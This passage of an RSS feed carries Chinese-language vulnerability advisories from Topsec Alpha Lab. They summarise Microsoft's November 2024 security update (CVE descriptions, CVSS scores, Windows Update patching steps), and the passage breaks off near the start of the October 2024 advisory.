0, 0, 0.9);">：Active Directory 证书服务特权提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已被公开披露。检查您是否发布了使用版本1证书模板创建的任何证书，其中主体名称的来源设置为“在请求中提供”，并且注册权限被授予更广泛的帐户集，例如域用户或域计算机，一个示例是内置Web 服务器模板，但由于其注册权限受限，默认情况下它不易受到攻击，成功利用此漏洞的攻击者可以获得域管理员权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49040：Microsoft Exchange 服务器欺骗漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已被公开披露且利用可能性较大。该漏洞允许远程攻击者执行欺骗攻击，该漏洞的存在是由于对用户提供的数据进行了不正确的处理，远程攻击者可以欺骗 Microsoft Exchange 客户端界面的页面内容。</span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td valign="top" style="word-break: break-all;" width="66.33333333333333"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43623</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows NT 操作系统内核特权提升漏洞</span></td><td valign="top" style="word-break: break-all;" width="86.33333333333333"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43629</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows DWM 核心库特权提升漏洞</span></td><td valign="top" style="word-break: break-all;" width="86.33333333333333"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43630</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows 内核特权提升漏洞</span></td><td valign="top" style="word-break: break-all;" width="86.33333333333333"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43636</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Win32k 特权提升漏洞</span></td><td valign="top" style="word-break: break-all;" width="74.33333333333333"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49033</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Word 安全功能绕过漏洞</span></td><td valign="top" style="word-break: break-all;" width="80.33333333333333"><span style="font-size: 14px;">7.5/6.5</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43623：Windows NT 操作系统内核特权提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows NT组件中的整数溢出漏洞（CWE-190），经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞，成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43629：</span>Windows DWM 核心库特权提升漏洞</span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows DWM 核心库中不受信任的指针漏洞（CWE-822），经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞，成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43630：</span>Windows 内核特权提升漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows 内核中的堆溢出漏洞（CWE-121），经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞，成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43636：</span>Win32k 特权提升漏洞</span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Win32k中不受信任的指针漏洞（CWE-822），经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞，成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49033：</span>Microsoft Word 安全功能绕过漏洞</span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞可能允许攻击者绕过 Office Protected View 的特定功能，利用此漏洞需要用户打开特制的 Word 文件，成功利用此漏洞需要攻击者收集特定于目标组件环境的信息。</span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td valign="top" style="word-break: break-all;" width="81.33333333333333"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43602</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Azure CycleCloud 远程代码执行漏洞</span></td><td valign="top" style="word-break: break-all;" width="90.33333333333333"><span style="font-size: 14px;">9.9/8.6</span></td></tr><tr style="word-break: break-all;"><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43639</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kerberos 远程代码执行漏洞</span></td><td valign="top" style="word-break: break-all;" width="90.33333333333333"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43498</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">.NET 和 Visual Studio 远程代码执行漏洞</span></td><td valign="top" style="word-break: break-all;" width="90.33333333333333"><span style="font-size: 14px;">9.8/8.5</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43602：Azure CycleCloud 远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">此漏洞允许具有基本用户权限的攻击者可以发送特制的请求来修改 Azure CycleCloud 群集的配置，以获得 Root 级别权限，从而使他们能够在当前实例中的任何 Azure CycleCloud 群集上执行命令，并且在某些情况下破坏管理员凭据。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43639：Windows Kerberos 远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞允许未经身份验证的攻击者可以使用特制的应用程序利用 Windows Kerberos 中的加密协议漏洞对目标执行远程代码执行。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="text-indent: 0em;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43498：</span>.NET 和 Visual Studio 远程代码执行漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">未经身份验证的远程攻击者可以通过向存在漏洞的 .NET Web 应用程序发送特制的请求或将特制的文件加载到存在漏洞的桌面应用程序中来利用此漏洞。<br/></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的11月补丁并安装：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov</a></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496662">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=96634962&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496662%26idx%3D1%26sn%3D89c2e0f34e55b91c488ba8ef1c710f04%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 Nov 2024 16:02:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年10月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496660&amp;idx=1&amp;sn=2df0f0b44caaa7409835aca42df5551c</link>
      <description>2024年10月09日，天融信阿尔法实验室监测到微软官方发布了10月安全更新。此次更新共修复117个漏洞，其中3个严重漏洞、112个重要漏洞、2个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-10-09 14:43</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年10月09日，天融信阿尔法实验室监测到微软官方发布了10月安全更新。此次更新共修复117个漏洞，其中3个严重漏洞、112个重要漏洞、2个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年10月09日，天融信阿尔法实验室监测到微软官方发布了10月安全更新。此次更新共修复117个漏洞，其中3个严重漏洞(Critical)、112个重要漏洞(Important)、2个中危漏洞(Moderate)。其中权限提升漏洞28个、远程代码执行漏洞42个、信息泄露漏洞6个、拒绝服务漏洞26个、欺骗漏洞7个、安全功能绕过漏洞7个、篡改漏洞1个。</span></p><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">本次微软安全更新涉及组件包括：Microsoft Management Console、Windows MSHTML Platform、Windows Hyper-V、Winlogon、Windows Kernel、Microsoft Graphics Component、Windows Storage Port Driver、OpenSSH for Windows、Microsoft Office、Remote Desktop Client、Windows Remote Desktop Services、Windows Routing and Remote Access Service (RRAS)、Windows Mobile Broadband等多个产品和组件。</span><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"></span></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">微软本次修复中，CVE-2024-43572、CVE-2024-43573被在野利用，且CVE-2024-20659、CVE-2024-43583被公开披露。</span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: 